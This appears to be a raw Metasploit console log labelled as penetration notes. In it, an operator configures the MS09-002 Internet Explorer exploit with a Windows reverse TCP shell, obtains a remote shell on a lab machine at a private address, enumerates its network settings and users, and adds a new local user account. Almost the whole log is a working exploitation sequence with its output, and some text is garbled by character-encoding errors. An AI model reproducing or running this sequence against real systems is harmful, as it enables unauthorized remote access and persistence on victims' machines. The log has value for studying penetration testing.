Welcome to the Metasploit Web console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ | ( |\__ \ | | | (| | | | _| _| _|\___|\__|\__,_|____/. __/_|\___/_|\__| _| =[Metasploit V3.4.2-dev [core:3.4 api:1.0] +----=[566 expl oits-283 auxiliary +----=[payloads-27 encoders-8 nops =[svn r9834 updated 308 days ago (2010.07.14) Warning: This copy of the Metasploit Framework is last updated 308 days ago. We recommend the framework at least every. For information in updating your copy of Metasploit, please see:http://www.metasploit.com/redmine/projects/framework/ wiki/updating >> use windows/browser/ms09_002_memory_corruption >> set payload windows/shell/reverse_tcp Payload = windows/shell/reverse_tcp >> Show options Module options:name current Setting Required Description-- ------------------------------------srvhost 0.0.0.0 yes the local host to listen on. Srvport 8080 Yes the local port to listen on. SSL FALSE no Negotiate SSL for incoming Connections sslversion SSL3 No Specify the version of SSL/should be used (accepted: SSL2, SSL3, TLS1) Uripath No the URI to use for this exploit (default is random) Payload options (WINDOWS/SHELL/REVERSE_TC P): Name current Setting Required Description--------------------------------------exitfunc process Yes Exit techniqu E:seh, thread, process lhost Yes the listen address Lport 4444 Yes the listen port Exploit target:id Name------0 wind oWS XP sp2-sp3/windows Vista sp0/ie 7 >> set srvhost 172.16.2.100 srvhost = 172.16.2.100 >> Set Lhost 172.16.2.100 lhost = 172.16.2.100 >> Show options Module options:name current Setting Required Description---- ----------------------------------srvhost 172.16.2.100 yes the local host to listen on. Srvport 8080 Yes the local port to listen on. SSL False no Negotiate SSL for incoming Connections sslversion SSL3 No Specify the version of SSL/should be used (ACC Epted:sSL2, SSL3, TLS1) Uripath No the URI to use for this exploit (default is random) Payload options (windows/shell/reverse_tcp ): Name current Setting Required Description--------------------------------------exitfunc process Yes Exit technique : SEH, Thread, process lhost 172.16.2.100 yes the listen address Lport 4444 Yes the listen port Exploit target:id Name-- ----0 Windows XP sp2-sp3/windows Vista sp0/ie 7 >> exploit [*] exploit running as background job. [*] Started reverse handler on 172.16.2.100:4444 [*] Using url:http://172.16.2.100:8080/9wzvwxuy [*] Server Started. >> back >> sessions-l Active sessions =============== Id Type information Connection--------------------- ------1 Shell 172.16.2.100:4444-172.16.2.120:1125 >> sessions-i 1 sessions-i 1 ' sessions ' 2?ê?? Ú2?? Òía2?? Üá?£?ò22?ê?? E?? Ddμ?3ìdò?ò?ú′|àí??? T?£c:\documents and Settings\administrator.www-95a235b5556\xà?? > >> ipconfig/all ipconfig/all Windows IP configuratioN Host Name ....: www-95a235b5556 Primary Dns Suffix ...: Node-Type-...........-the- . : Unknown IP Routing Enabled ..... : No WINS Proxy Enabled ..... : No Ethernet Adapter C:\Documents and Settings\administrator.www-95a235b5556\xà?? > >> NET user net user \\www-95a235b5556μ?ó?? §?ê?§-------------------------------------------------------------------------------Administrator Guest HelpAssistant support_388945a0? üá?3é1|íê3é?£c:\documents and Settings\administrator.www-95a235b5556\xà?? > >> NET user shentouceshiwy/add net user shentouceshiwy/add üá?3é1|íê3é?£c:\documents and SETTINGS\ADMINISTR Ator. Www-95a235b5556\xà?? > >> NET user net user \\www-95a235b5556μ?ó?? §?ê?§-------------------------------------------------------------------------------Administrator Guest HelpAssistant shentouceshiwy support_388945a0? Üá?3é1|íê3é?£
Penetration notes -2013-07-13 Windows XP sp2-sp3/windows Vista sp0/ie 7